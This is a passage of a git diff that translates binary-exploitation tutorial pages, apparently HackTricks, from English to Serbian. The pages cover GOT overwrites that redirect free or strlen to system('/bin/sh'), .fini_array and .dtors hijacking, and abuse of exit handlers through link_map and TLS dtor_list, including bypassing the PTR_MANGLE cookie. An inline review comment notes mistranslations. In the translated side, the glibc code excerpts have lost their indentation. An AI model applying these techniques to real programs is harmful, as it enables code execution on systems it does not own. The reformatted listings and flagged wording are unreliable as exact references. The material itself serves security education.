+**Procedure Linkage Table (PLT)** blisko sarađuje sa GOT i služi kao trampolin za upravljanje pozivima spoljašnjim funkcijama. Kada binarna datoteka **pozove spoljašnju funkciju prvi put, kontrola se prebacuje na unos u PLT koji je povezan sa tom funkcijom**. Ovaj PLT unos je odgovoran za pozivanje dinamičkog linker-a da reši adresu funkcije ako već nije rešena. Nakon što se adresa reši, ona se čuva u **GOT**. -**Therefore,** GOT entries are used directly once the address of an external function or variable is resolved. **PLT entries are used to facilitate the initial resolution** of these addresses via the dynamic linker. +**Dakle,** GOT unosi se koriste direktno kada se adresa spoljašnje funkcije ili promenljive reši. **PLT unosi se koriste za olakšavanje inicijalnog rešavanja** ovih adresa putem dinamičkog linker-a. -## Get Execution +## Dobijanje izvršenja -### Check the GOT +### Proverite GOT -Get the address to the GOT table with: **`objdump -s -j .got ./exec`** +Dobijte adresu GOT tabele sa: **`objdump -s -j .got ./exec`** ![](<../../images/image (121).png>) -Observe how after **loading** the **executable** in GEF you can **see** the **functions** that are in the **GOT**: `gef➤ x/20x 0xADDR_GOT` +Posmatrajte kako nakon **učitavanja** **izvršne datoteke** u GEF možete **videti** **funkcije** koje se nalaze u **GOT**: `gef➤ x/20x 0xADDR_GOT` -![](<../../images/image (620) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (2) (2).png>) +![](<../../images/image (620) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (2) (2).png>) -Using GEF you can **start** a **debugging** session and execute **`got`** to see the got table: +Koristeći GEF možete **početi** sesiju **debugovanja** i izvršiti **`got`** da vidite got tabelu: ![](<../../images/image (496).png>) ### GOT2Exec -In a binary the GOT has 
the **addresses to the functions or** to the **PLT** section that will load the function address. The goal of this arbitrary write is to **override a GOT entry** of a function that is going to be executed later **with** the **address** of the PLT of the **`system`** **function** for example. +U binarnoj datoteci GOT ima **adrese funkcija ili** do **PLT** sekcije koja će učitati adresu funkcije. Cilj ovog proizvoljnog pisanja je da **prepiše GOT unos** funkcije koja će biti izvršena kasnije **sa** **adresom** PLT-a **`system`** **funkcije** na primer. -Ideally, you will **override** the **GOT** of a **function** that is **going to be called with parameters controlled by you** (so you will be able to control the parameters sent to the system function). +Idealan scenario je da **prepišete** **GOT** funkcije koja će **biti pozvana sa parametrima koje kontrolišete** (tako da ćete moći da kontrolišete parametre poslati sistemskoj funkciji). -If **`system`** **isn't used** by the binary, the system function **won't** have an entry in the PLT. In this scenario, you will **need to leak first the address** of the `system` function and then overwrite the GOT to point to this address. +Ako **`system`** **nije korišćen** od strane binarne datoteke, sistemska funkcija **neće** imati unos u PLT-u. U ovom scenariju, prvo ćete **morati da iscurite adresu** funkcije `system` i zatim prepisati GOT da pokazuje na ovu adresu. -You can see the PLT addresses with **`objdump -j .plt -d ./vuln_binary`** +Možete videti PLT adrese sa **`objdump -j .plt -d ./vuln_binary`** -## libc GOT entries +## libc GOT unosi -The **GOT of libc** is usually compiled with **partial RELRO**, making it a nice target for this supposing it's possible to figure out its address ([**ASLR**](../common-binary-protections-and-bypasses/aslr/)). 
+**GOT libc** se obično kompajlira sa **delimičnim RELRO**, što ga čini dobrim ciljem za ovo pod pretpostavkom da je moguće utvrditi njegovu adresu ([**ASLR**](../common-binary-protections-and-bypasses/aslr/)). -Common functions of the libc are going to call **other internal functions** whose GOT could be overwritten in order to get code execution. +Uobičajene funkcije libc će pozvati **druge interne funkcije** čiji GOT bi mogao biti prepisan kako bi se dobila izvršna kod. -Find [**more information about this technique here**](https://github.com/nobodyisnobody/docs/blob/main/code.execution.on.last.libc/README.md#1---targetting-libc-got-entries). +Pronađite [**više informacija o ovoj tehnici ovde**](https://github.com/nobodyisnobody/docs/blob/main/code.execution.on.last.libc/README.md#1---targetting-libc-got-entries). ### **Free2system** -In heap exploitation CTFs it's common to be able to control the content of chunks and at some point even overwrite the GOT table. A simple trick to get RCE if one gadgets aren't available is to overwrite the `free` GOT address to point to `system` and to write inside a chunk `"/bin/sh"`. This way when this chunk is freed, it'll execute `system("/bin/sh")`. +U eksploataciji heap-a na CTF-ima je uobičajeno moći kontrolisati sadržaj delova i u nekom trenutku čak i prepisati GOT tabelu. Jednostavna trik da se dobije RCE ako gadgeti nisu dostupni je da se prepiše `free` GOT adresa da pokazuje na `system` i da se unese u deo `"/bin/sh"`. Na ovaj način, kada se ovaj deo oslobodi, izvršiće se `system("/bin/sh")`. ### **Strlen2system** -Another common technique is to overwrite the **`strlen`** GOT address to point to **`system`**, so if this function is called with user input it's posisble to pass the string `"/bin/sh"` and get a shell. 
+Još jedna uobičajena tehnika je prepisivanje **`strlen`** GOT adrese da pokazuje na **`system`**, tako da ako se ova funkcija pozove sa korisničkim unosom, moguće je proslediti string `"/bin/sh"` i dobiti shell. -Moreover, if `puts` is used with user input, it's possible to overwrite the `strlen` GOT address to point to `system` and pass the string `"/bin/sh"` to get a shell because **`puts` will call `strlen` with the user input**. +Štaviše, ako se `puts` koristi sa korisničkim unosom, moguće je prepisati `strlen` GOT adresu da pokazuje na `system` i proslediti string `"/bin/sh"` da bi se dobio shell jer **`puts` će pozvati `strlen` sa korisničkim unosom**. -## **One Gadget** +## **Jedan Gadget** {{#ref}} ../rop-return-oriented-programing/ret2lib/one-gadget.md {{#endref}} -## **Abusing GOT from Heap** +## **Zloupotreba GOT iz Heap-a** -A common way to obtain RCE from a heap vulnerability is to abuse a fastbin so it's possible to add the part of the GOT table into the fast bin, so whenever that chunk is allocated it'll be possible to **overwrite the pointer of a function, usually `free`**.\ -Then, pointing `free` to `system` and freeing a chunk where was written `/bin/sh\x00` will execute a shell. +Uobičajen način da se dobije RCE iz ranjivosti heap-a je zloupotreba fastbin-a tako da je moguće dodati deo GOT tabele u fast bin, tako da kad god se taj deo alocira, biće moguće **prepisati pokazivač funkcije, obično `free`**.\ +Zatim, usmeravanje `free` na `system` i oslobađanje dela gde je napisan `/bin/sh\x00` izvršiće shell. 
-It's possible to find an [**example here**](https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/chunk_extend_overlapping/#hitcon-trainging-lab13)**.** +Moguće je pronaći [**primer ovde**](https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/chunk_extend_overlapping/#hitcon-trainging-lab13)**.** -## **Protections** +## **Zaštite** -The **Full RELRO** protection is meant to protect agains this kind of technique by resolving all the addresses of the functions when the binary is started and making the **GOT table read only** after it: +Zaštita **Full RELRO** je namenjena zaštiti od ove vrste tehnike rešavanjem svih adresa funkcija kada se binarna datoteka pokrene i čineći **GOT tabelu samo za čitanje** nakon toga: {{#ref}} ../common-binary-protections-and-bypasses/relro.md {{#endref}} -## References +## Reference - [https://ir0nstone.gitbook.io/notes/types/stack/got-overwrite/exploiting-a-got-overwrite](https://ir0nstone.gitbook.io/notes/types/stack/got-overwrite/exploiting-a-got-overwrite) - [https://ir0nstone.gitbook.io/notes/types/stack/one-gadgets-and-malloc-hook](https://ir0nstone.gitbook.io/notes/types/stack/one-gadgets-and-malloc-hook) diff --git a/src/binary-exploitation/arbitrary-write-2-exec/www2exec-.dtors-and-.fini_array.md b/src/binary-exploitation/arbitrary-write-2-exec/www2exec-.dtors-and-.fini_array.md index 31e45fba4..670f419c3 100644 --- a/src/binary-exploitation/arbitrary-write-2-exec/www2exec-.dtors-and-.fini_array.md +++ b/src/binary-exploitation/arbitrary-write-2-exec/www2exec-.dtors-and-.fini_array.md 
@@ -5,52 +5,48 @@ ## .dtors > [!CAUTION] -> Nowadays is very **weird to find a binary with a .dtors section!** +> Danas je veoma **čudno pronaći binarni fajl sa .dtors sekcijom!** -The destructors are functions that are **executed before program finishes** (after the `main` function returns).\ -The addresses to these functions are stored inside the **`.dtors`** section of the binary and therefore, if you manage to **write** the **address** to a **shellcode** in **`__DTOR_END__`** , that will be **executed** before the programs ends. - -Get the address of this section with: +Destruktori su funkcije koje se **izvršavaju pre nego što program završi** (nakon što `main` funkcija vrati).\ +Adrese ovih funkcija se čuvaju unutar **`.dtors`** sekcije binarnog fajla i stoga, ako uspete da **napišete** **adresu** u **shellcode** u **`__DTOR_END__`**, to će biti **izvršeno** pre nego što program završi. +Dobijte adresu ove sekcije sa: ```bash objdump -s -j .dtors /exec rabin -s /exec | grep “__DTOR” ``` - -Usually you will find the **DTOR** markers **between** the values `ffffffff` and `00000000`. So if you just see those values, it means that there **isn't any function registered**. So **overwrite** the **`00000000`** with the **address** to the **shellcode** to execute it. +Obično ćete pronaći **DTOR** oznake **između** vrednosti `ffffffff` i `00000000`. Dakle, ako samo vidite te vrednosti, to znači da **nema registrovane funkcije**. Tako **prepišite** **`00000000`** sa **adresom** do **shellcode** da biste ga izvršili. > [!WARNING] -> Ofc, you first need to find a **place to store the shellcode** in order to later call it. +> Naravno, prvo morate pronaći **mesto za skladištenje shellcode** kako biste ga kasnije pozvali. ## **.fini_array** -Essentially this is a structure with **functions that will be called** before the program finishes, like **`.dtors`**. 
This is interesting if you can call your **shellcode just jumping to an address**, or in cases where you need to go **back to `main`** again to **exploit the vulnerability a second time**. - +U suštini, ovo je struktura sa **funkcijama koje će biti pozvane** pre nego što program završi, poput **`.dtors`**. Ovo je zanimljivo ako možete pozvati svoj **shellcode jednostavno skakanjem na adresu**, ili u slučajevima kada treba da se **vratite na `main`** ponovo da biste **iskoristili ranjivost drugi put**. ```bash objdump -s -j .fini_array ./greeting ./greeting: file format elf32-i386 Contents of section .fini_array: - 8049934 a0850408 +8049934 a0850408 #Put your address in 0x8049934 ``` +Napomena da kada se funkcija iz **`.fini_array`** izvrši, prelazi se na sledeću, tako da se neće izvršavati više puta (sprečavanje večitih petlji), ali će takođe dati samo 1 **izvršenje funkcije** postavljene ovde. -Note that when a function from the **`.fini_array`** is executed it moves to the next one, so it won't be executed several time (preventing eternal loops), but also it'll only give you 1 **execution of the function** placed here. +Napomena da se unosi u **`.fini_array`** pozivaju u **obrnutom** redosledu, tako da verovatno želite da počnete da pišete od poslednjeg. -Note that entries in `.fini_array` are called in **reverse** order, so you probably wants to start writing from the last one. 
+#### Večna petlja -#### Eternal loop +Da biste iskoristili **`.fini_array`** za dobijanje večite petlje, možete [**proveriti šta je ovde urađeno**](https://guyinatuxedo.github.io/17-stack_pivot/insomnihack18_onewrite/index.html)**:** Ako imate najmanje 2 unosa u **`.fini_array`**, možete: -In order to abuse **`.fini_array`** to get an eternal loop you can [**check what was done here**](https://guyinatuxedo.github.io/17-stack_pivot/insomnihack18_onewrite/index.html)**:** If you have at least 2 entries in **`.fini_array`**, you can: - -- Use your first write to **call the vulnerable arbitrary write function** again -- Then, calculate the return address in the stack stored by **`__libc_csu_fini`** (the function that is calling all the `.fini_array` functions) and put there the **address of `__libc_csu_fini`** - - This will make **`__libc_csu_fini`** call himself again executing the **`.fini_array`** functions again which will call the vulnerable WWW function 2 times: one for **arbitrary write** and another one to overwrite again the **return address of `__libc_csu_fini`** on the stack to call itself again. +- Iskoristiti svoje prvo pisanje da ponovo **pozovete ranjivu funkciju za proizvoljno pisanje** +- Zatim, izračunati adresu povratka na steku koju čuva **`__libc_csu_fini`** (funkcija koja poziva sve funkcije iz **`.fini_array`**) i staviti tamo **adresu `__libc_csu_fini`** +- Ovo će učiniti da **`__libc_csu_fini`** ponovo pozove sebe izvršavajući funkcije iz **`.fini_array`** ponovo, što će pozvati ranjivu WWW funkciju 2 puta: jednom za **proizvoljno pisanje** i još jednom da ponovo prepiše **adresu povratka `__libc_csu_fini`** na steku da bi se ponovo pozvao. > [!CAUTION] -> Note that with [**Full RELRO**](../common-binary-protections-and-bypasses/relro.md)**,** the section **`.fini_array`** is made **read-only**. -> In newer versions, even with [**Partial RELRO**] the section **`.fini_array`** is made **read-only** also. 
+> Napomena da sa [**Full RELRO**](../common-binary-protections-and-bypasses/relro.md)**,** sekcija **`.fini_array`** je postavljena na **samo za čitanje**. +> U novijim verzijama, čak i sa [**Partial RELRO**] sekcija **`.fini_array`** je takođe postavljena na **samo za čitanje**. {{#include ../../banners/hacktricks-training.md}} diff --git a/src/binary-exploitation/arbitrary-write-2-exec/www2exec-atexit.md b/src/binary-exploitation/arbitrary-write-2-exec/www2exec-atexit.md index 97c286231..78ad7d59a 100644 --- a/src/binary-exploitation/arbitrary-write-2-exec/www2exec-atexit.md +++ b/src/binary-exploitation/arbitrary-write-2-exec/www2exec-atexit.md 
@@ -5,35 +5,34 @@ ## **\_\_atexit Structures** > [!CAUTION] -> Nowadays is very **weird to exploit this!** +> Danas je veoma **čudno iskoristiti ovo!** -**`atexit()`** is a function to which **other functions are passed as parameters.** These **functions** will be **executed** when executing an **`exit()`** or the **return** of the **main**.\ -If you can **modify** the **address** of any of these **functions** to point to a shellcode for example, you will **gain control** of the **process**, but this is currently more complicated.\ -Currently the **addresses to the functions** to be executed are **hidden** behind several structures and finally the address to which it points are not the addresses of the functions, but are **encrypted with XOR** and displacements with a **random key**. So currently this attack vector is **not very useful at least on x86** and **x64_86**.\ -The **encryption function** is **`PTR_MANGLE`**. **Other architectures** such as m68k, mips32, mips64, aarch64, arm, hppa... **do not implement the encryption** function because it **returns the same** as it received as input. So these architectures would be attackable by this vector. +**`atexit()`** je funkcija kojoj se **prolaze druge funkcije kao parametri.** Ove **funkcije** će biti **izvršene** prilikom izvršavanja **`exit()`** ili **povratka** iz **main**.\ +Ako možete **modifikovati** **adresu** bilo koje od ovih **funkcija** da pokazuje na shellcode na primer, dobićete **kontrolu** nad **procesom**, ali je to trenutno komplikovanije.\ +Trenutno su **adrese funkcija** koje treba izvršiti **sakrivene** iza nekoliko struktura i konačno adresa na koju pokazuje nije adresa funkcija, već je **kriptovana sa XOR** i pomeranjima sa **nasumičnim ključem**. Tako da je trenutno ovaj napadni vektor **ne baš koristan barem na x86** i **x64_86**.\ +**Funkcija kriptovanja** je **`PTR_MANGLE`**. **Druge arhitekture** kao što su m68k, mips32, mips64, aarch64, arm, hppa... 
**ne implementiraju funkciju kriptovanja** jer **vraća isto** što je primila kao ulaz. Tako da bi ove arhitekture bile napadljive ovim vektorom. -You can find an in depth explanation on how this works in [https://m101.github.io/binholic/2017/05/20/notes-on-abusing-exit-handlers.html](https://m101.github.io/binholic/2017/05/20/notes-on-abusing-exit-handlers.html) +Možete pronaći detaljno objašnjenje o tome kako ovo funkcioniše na [https://m101.github.io/binholic/2017/05/20/notes-on-abusing-exit-handlers.html](https://m101.github.io/binholic/2017/05/20/notes-on-abusing-exit-handlers.html) ## link_map -As explained [**in this post**](https://github.com/nobodyisnobody/docs/blob/main/code.execution.on.last.libc/README.md#2---targetting-ldso-link_map-structure), If the program exits using `return` or `exit()` it'll run `__run_exit_handlers()` which will call registered destructors. +Kao što je objašnjeno [**u ovom postu**](https://github.com/nobodyisnobody/docs/blob/main/code.execution.on.last.libc/README.md#2---targetting-ldso-link_map-structure), Ako program završi koristeći `return` ili `exit()` pokrenuće `__run_exit_handlers()` koji će pozvati registrovane destruktore. > [!CAUTION] -> If the program exits via **`_exit()`** function, it'll call the **`exit` syscall** and the exit handlers will not be executed. So, to confirm `__run_exit_handlers()` is executed you can set a breakpoint on it. - -The important code is ([source](https://elixir.bootlin.com/glibc/glibc-2.32/source/elf/dl-fini.c#L131)): +> Ako program završi putem **`_exit()`** funkcije, pozvaće **`exit` syscall** i izlazni handleri neće biti izvršeni. Dakle, da biste potvrdili da je `__run_exit_handlers()` izvršen, možete postaviti breakpoint na njega. 
+Važan kod je ([source](https://elixir.bootlin.com/glibc/glibc-2.32/source/elf/dl-fini.c#L131)): ```c ElfW(Dyn) *fini_array = map->l_info[DT_FINI_ARRAY]; if (fini_array != NULL) - { - ElfW(Addr) *array = (ElfW(Addr) *) (map->l_addr + fini_array->d_un.d_ptr); - size_t sz = (map->l_info[DT_FINI_ARRAYSZ]->d_un.d_val / sizeof (ElfW(Addr))); +{ +ElfW(Addr) *array = (ElfW(Addr) *) (map->l_addr + fini_array->d_un.d_ptr); +size_t sz = (map->l_info[DT_FINI_ARRAYSZ]->d_un.d_val / sizeof (ElfW(Addr))); - while (sz-- > 0) - ((fini_t) array[sz]) (); - } - [...] +while (sz-- > 0) +((fini_t) array[sz]) (); +} +[...] 
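Review bot: `+**`atexit()`** je funkcija kojoj se **prolaze druge funkcije kao parametri.**` uses the wrong verb: "prolaze" means "walk past", while the English says the functions are passed as parameters, so it should read `kojoj se **prosleđuju druge funkcije kao parametri**`. In the same paragraph `+... **ne baš koristan barem na x86** i **x64_86**` carries the `x64_86` typo over from the English (the architecture is `x86_64`), and in the link_map section `+Kao što je objašnjeno [**u ovom postu**](...), Ako program završi ...` should lowercase `ako` after the comma. Finally, the dl-fini.c listing in this hunk has all of its indentation stripped (`+ElfW(Addr) *array = ...`, `+while (sz-- > 0)` and `+((fini_t) array[sz]) ();` all start at column 0), so the loop body can no longer be told apart from the enclosing block; the translation should leave fenced code untouched so it still matches the linked glibc source.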
@@ -41,198 +40,187 @@ if (fini_array != NULL) // This is the d_un structure ptype l->l_info[DT_FINI_ARRAY]->d_un type = union { - Elf64_Xword d_val; // address of function that will be called, we put our onegadget here - Elf64_Addr d_ptr; // offset from l->l_addr of our structure +Elf64_Xword d_val; // address of function that will be called, we put our onegadget here +Elf64_Addr d_ptr; // offset from l->l_addr of our structure } ``` +Napomena kako `map -> l_addr + fini_array -> d_un.d_ptr` se koristi za **izračunavanje** pozicije **niza funkcija koje treba pozvati**. -Note how `map -> l_addr + fini_array -> d_un.d_ptr` is used to **calculate** the position of the **array of functions to call**. +Postoji **nekoliko opcija**: -There are a **couple of options**: - -- Overwrite the value of `map->l_addr` to make it point to a **fake `fini_array`** with instructions to execute arbitrary code -- Overwrite `l_info[DT_FINI_ARRAY]` and `l_info[DT_FINI_ARRAYSZ]` entries (which are more or less consecutive in memory) , to make them **points to a forged `Elf64_Dyn`** structure that will make again **`array` points to a memory** zone the attacker controlled. - - [**This writeup**](https://github.com/nobodyisnobody/write-ups/tree/main/DanteCTF.2023/pwn/Sentence.To.Hell) overwrites `l_info[DT_FINI_ARRAY]` with the address of a controlled memory in `.bss` containing a fake `fini_array`. This fake array contains **first a** [**one gadget**](../rop-return-oriented-programing/ret2lib/one-gadget.md) **address** which will be executed and then the **difference** between in the address of this **fake array** and the v**alue of `map->l_addr`** so `*array` will point to the fake array. - - According to main post of this technique and [**this writeup**](https://activities.tjhsst.edu/csc/writeups/angstromctf-2021-wallstreet) ld.so leave a pointer on the stack that points to the binary `link_map` in ld.so. 
With an arbitrary write it's possible to overwrite it and make it point to a fake `fini_array` controlled by the attacker with the address to a [**one gadget**](../rop-return-oriented-programing/ret2lib/one-gadget.md) for example. - -Following the previous code you can find another interesting section with the code: +- Prepisati vrednost `map->l_addr` da pokazuje na **lažni `fini_array`** sa instrukcijama za izvršavanje proizvoljnog koda +- Prepisati `l_info[DT_FINI_ARRAY]` i `l_info[DT_FINI_ARRAYSZ]` unose (koji su više-manje uzastopni u memoriji), da ih **usmerite na falsifikovanu `Elf64_Dyn`** strukturu koja će ponovo **`array` usmeriti na memorijsku** zonu koju kontroliše napadač. +- [**Ova analiza**](https://github.com/nobodyisnobody/write-ups/tree/main/DanteCTF.2023/pwn/Sentence.To.Hell) prepisuje `l_info[DT_FINI_ARRAY]` sa adresom kontrolisane memorije u `.bss` koja sadrži lažni `fini_array`. Ovaj lažni niz sadrži **prvo** [**jednu napravu**](../rop-return-oriented-programing/ret2lib/one-gadget.md) **adresu** koja će biti izvršena, a zatim **razliku** između adrese ovog **lažnog niza** i **vrednosti `map->l_addr`** tako da `*array` pokazuje na lažni niz. +- Prema glavnom postu ove tehnike i [**ovoj analizi**](https://activities.tjhsst.edu/csc/writeups/angstromctf-2021-wallstreet) ld.so ostavlja pokazivač na steku koji pokazuje na binarni `link_map` u ld.so. Sa proizvoljnim pisanjem moguće je prepisati ga i usmeriti na lažni `fini_array` koji kontroliše napadač sa adresom do [**jedne naprave**](../rop-return-oriented-programing/ret2lib/one-gadget.md) na primer. +Iza prethodnog koda možete pronaći još jedan zanimljiv odeljak sa kodom: ```c /* Next try the old-style destructor. 
*/ ElfW(Dyn) *fini = map->l_info[DT_FINI]; if (fini != NULL) - DL_CALL_DT_FINI (map, ((void *) map->l_addr + fini->d_un.d_ptr)); +DL_CALL_DT_FINI (map, ((void *) map->l_addr + fini->d_un.d_ptr)); } ``` +U ovom slučaju bi bilo moguće prepisati vrednost `map->l_info[DT_FINI]` koja pokazuje na lažnu `ElfW(Dyn)` strukturu. Pronađite [**više informacija ovde**](https://github.com/nobodyisnobody/docs/blob/main/code.execution.on.last.libc/README.md#2---targetting-ldso-link_map-structure). -In this case it would be possible to overwrite the value of `map->l_info[DT_FINI]` pointing to a forged `ElfW(Dyn)` structure. Find [**more information here**](https://github.com/nobodyisnobody/docs/blob/main/code.execution.on.last.libc/README.md#2---targetting-ldso-link_map-structure). +## TLS-Storage dtor_list prepisivanje u **`__run_exit_handlers`** -## TLS-Storage dtor_list overwrite in **`__run_exit_handlers`** - -As [**explained here**](https://github.com/nobodyisnobody/docs/blob/main/code.execution.on.last.libc/README.md#5---code-execution-via-tls-storage-dtor_list-overwrite), if a program exits via `return` or `exit()`, it'll execute **`__run_exit_handlers()`** which will call any destructors function registered. - -Code from `_run_exit_handlers()`: +Kao što je [**objašnjeno ovde**](https://github.com/nobodyisnobody/docs/blob/main/code.execution.on.last.libc/README.md#5---code-execution-via-tls-storage-dtor_list-overwrite), ako program završi putem `return` ili `exit()`, izvršiće **`__run_exit_handlers()`** koja će pozvati sve funkcije destruktora koje su registrovane. +Kod iz `_run_exit_handlers()`: ```c /* Call all functions registered with `atexit' and `on_exit', - in the reverse of the order in which they were registered - perform stdio cleanup, and terminate program execution with STATUS. */ +in the reverse of the order in which they were registered +perform stdio cleanup, and terminate program execution with STATUS. 
*/ void attribute_hidden __run_exit_handlers (int status, struct exit_function_list **listp, - bool run_list_atexit, bool run_dtors) +bool run_list_atexit, bool run_dtors) { - /* First, call the TLS destructors. */ +/* First, call the TLS destructors. */ #ifndef SHARED - if (&__call_tls_dtors != NULL) +if (&__call_tls_dtors != NULL) #endif - if (run_dtors) - __call_tls_dtors (); +if (run_dtors) +__call_tls_dtors (); ``` - -Code from **`__call_tls_dtors()`**: - +Kod iz **`__call_tls_dtors()`**: ```c typedef void (*dtor_func) (void *); struct dtor_list //struct added { - dtor_func func; - void *obj; - struct link_map *map; - struct dtor_list *next; +dtor_func func; +void *obj; +struct link_map *map; +struct dtor_list *next; }; [...] /* Call the destructors. This is called either when a thread returns from the - initial function or when the process exits via the exit function. */ +initial function or when the process exits via the exit function. */ void __call_tls_dtors (void) { - while (tls_dtor_list) // parse the dtor_list chained structures - { - struct dtor_list *cur = tls_dtor_list; // cur point to tls-storage dtor_list - dtor_func func = cur->func; - PTR_DEMANGLE (func); // demangle the function ptr +while (tls_dtor_list) // parse the dtor_list chained structures +{ +struct dtor_list *cur = tls_dtor_list; // cur point to tls-storage dtor_list +dtor_func func = cur->func; +PTR_DEMANGLE (func); // demangle the function ptr - tls_dtor_list = tls_dtor_list->next; // next dtor_list structure - func (cur->obj); - [...] - } +tls_dtor_list = tls_dtor_list->next; // next dtor_list structure +func (cur->obj); +[...] +} } ``` +Za svaku registrovanu funkciju u **`tls_dtor_list`**, demangliraće pokazivač iz **`cur->func`** i pozvati ga sa argumentom **`cur->obj`**. -For each registered function in **`tls_dtor_list`**, it'll demangle the pointer from **`cur->func`** and call it with the argument **`cur->obj`**. 
- -Using the **`tls`** function from this [**fork of GEF**](https://github.com/bata24/gef), it's possible to see that actually the **`dtor_list`** is very **close** to the **stack canary** and **PTR_MANGLE cookie**. So, with an overflow on it's it would be possible to **overwrite** the **cookie** and the **stack canary**.\ -Overwriting the PTR_MANGLE cookie, it would be possible to **bypass the `PTR_DEMANLE` function** by setting it to 0x00, will mean that the **`xor`** used to get the real address is just the address configured. Then, by writing on the **`dtor_list`** it's possible **chain several functions** with the function **address** and it's **argument.** - -Finally notice that the stored pointer is not only going to be xored with the cookie but also rotated 17 bits: +Koristeći **`tls`** funkciju iz ovog [**fork-a GEF**](https://github.com/bata24/gef), moguće je videti da je zapravo **`dtor_list`** veoma **blizu** **stack canary** i **PTR_MANGLE cookie**. Dakle, sa prelivanjem na njemu bilo bi moguće **prepisati** **cookie** i **stack canary**.\ +Prepisivanjem PTR_MANGLE cookie-a, bilo bi moguće **obići `PTR_DEMANLE` funkciju** postavljanjem na 0x00, što će značiti da je **`xor`** korišćen za dobijanje pravog adresa samo adresa koja je konfigurisana. Zatim, pisanjem na **`dtor_list`** moguće je **povezati nekoliko funkcija** sa **adresom funkcije** i njenim **argumentom**. +Na kraju, primetite da se sačuvani pokazivač ne samo da će biti xored sa cookie-jem, već će biti i rotiran 17 bita: ```armasm 0x00007fc390444dd4 <+36>: mov rax,QWORD PTR [rbx] --> mangled ptr 0x00007fc390444dd7 <+39>: ror rax,0x11 --> rotate of 17 bits 0x00007fc390444ddb <+43>: xor rax,QWORD PTR fs:0x30 --> xor with PTR_MANGLE ``` +Tako da treba da uzmete ovo u obzir pre nego što dodate novu adresu. -So you need to take this into account before adding a new address. 
+Pronađite primer u [**originalnom postu**](https://github.com/nobodyisnobody/docs/blob/main/code.execution.on.last.libc/README.md#5---code-execution-via-tls-storage-dtor_list-overwrite). -Find an example in the [**original post**](https://github.com/nobodyisnobody/docs/blob/main/code.execution.on.last.libc/README.md#5---code-execution-via-tls-storage-dtor_list-overwrite). +## Ostali izmenjeni pokazivači u **`__run_exit_handlers`** -## Other mangled pointers in **`__run_exit_handlers`** - -This technique is [**explained here**](https://github.com/nobodyisnobody/docs/blob/main/code.execution.on.last.libc/README.md#5---code-execution-via-tls-storage-dtor_list-overwrite) and depends again on the program **exiting calling `return` or `exit()`** so **`__run_exit_handlers()`** is called. - -Let's check more code of this function: +Ova tehnika je [**objašnjena ovde**](https://github.com/nobodyisnobody/docs/blob/main/code.execution.on.last.libc/README.md#5---code-execution-via-tls-storage-dtor_list-overwrite) i ponovo zavisi od toga da program **izlazi pozivajući `return` ili `exit()`** tako da se **`__run_exit_handlers()`** poziva. +Hajde da proverimo više koda ove funkcije: ```c - while (true) - { - struct exit_function_list *cur; +while (true) +{ +struct exit_function_list *cur; - restart: - cur = *listp; +restart: +cur = *listp; - if (cur == NULL) - { - /* Exit processing complete. We will not allow any more - atexit/on_exit registrations. */ - __exit_funcs_done = true; - break; - } +if (cur == NULL) +{ +/* Exit processing complete. We will not allow any more +atexit/on_exit registrations. 
*/ +__exit_funcs_done = true; +break; +} - while (cur->idx > 0) - { - struct exit_function *const f = &cur->fns[--cur->idx]; - const uint64_t new_exitfn_called = __new_exitfn_called; +while (cur->idx > 0) +{ +struct exit_function *const f = &cur->fns[--cur->idx]; +const uint64_t new_exitfn_called = __new_exitfn_called; - switch (f->flavor) - { - void (*atfct) (void); - void (*onfct) (int status, void *arg); - void (*cxafct) (void *arg, int status); - void *arg; +switch (f->flavor) +{ +void (*atfct) (void); +void (*onfct) (int status, void *arg); +void (*cxafct) (void *arg, int status); +void *arg; - case ef_free: - case ef_us: - break; - case ef_on: - onfct = f->func.on.fn; - arg = f->func.on.arg; - PTR_DEMANGLE (onfct); +case ef_free: +case ef_us: +break; +case ef_on: +onfct = f->func.on.fn; +arg = f->func.on.arg; +PTR_DEMANGLE (onfct); - /* Unlock the list while we call a foreign function. */ - __libc_lock_unlock (__exit_funcs_lock); - onfct (status, arg); - __libc_lock_lock (__exit_funcs_lock); - break; - case ef_at: - atfct = f->func.at; - PTR_DEMANGLE (atfct); +/* Unlock the list while we call a foreign function. */ +__libc_lock_unlock (__exit_funcs_lock); +onfct (status, arg); +__libc_lock_lock (__exit_funcs_lock); +break; +case ef_at: +atfct = f->func.at; +PTR_DEMANGLE (atfct); - /* Unlock the list while we call a foreign function. */ - __libc_lock_unlock (__exit_funcs_lock); - atfct (); - __libc_lock_lock (__exit_funcs_lock); - break; - case ef_cxa: - /* To avoid dlclose/exit race calling cxafct twice (BZ 22180), - we must mark this function as ef_free. */ - f->flavor = ef_free; - cxafct = f->func.cxa.fn; - arg = f->func.cxa.arg; - PTR_DEMANGLE (cxafct); +/* Unlock the list while we call a foreign function. */ +__libc_lock_unlock (__exit_funcs_lock); +atfct (); +__libc_lock_lock (__exit_funcs_lock); +break; +case ef_cxa: +/* To avoid dlclose/exit race calling cxafct twice (BZ 22180), +we must mark this function as ef_free. 
*/ +f->flavor = ef_free; +cxafct = f->func.cxa.fn; +arg = f->func.cxa.arg; +PTR_DEMANGLE (cxafct); - /* Unlock the list while we call a foreign function. */ - __libc_lock_unlock (__exit_funcs_lock); - cxafct (arg, status); - __libc_lock_lock (__exit_funcs_lock); - break; - } +/* Unlock the list while we call a foreign function. */ +__libc_lock_unlock (__exit_funcs_lock); +cxafct (arg, status); +__libc_lock_lock (__exit_funcs_lock); +break; +} - if (__glibc_unlikely (new_exitfn_called != __new_exitfn_called)) - /* The last exit function, or another thread, has registered - more exit functions. Start the loop over. */ - goto restart; - } +if (__glibc_unlikely (new_exitfn_called != __new_exitfn_called)) +/* The last exit function, or another thread, has registered +more exit functions. Start the loop over. */ +goto restart; +} - *listp = cur->next; - if (*listp != NULL) - /* Don't free the last element in the chain, this is the statically - allocate element. */ - free (cur); - } +*listp = cur->next; +if (*listp != NULL) +/* Don't free the last element in the chain, this is the statically +allocate element. */ +free (cur); +} - __libc_lock_unlock (__exit_funcs_lock); +__libc_lock_unlock (__exit_funcs_lock); ``` +Promenljiva `f` pokazuje na **`initial`** strukturu i u zavisnosti od 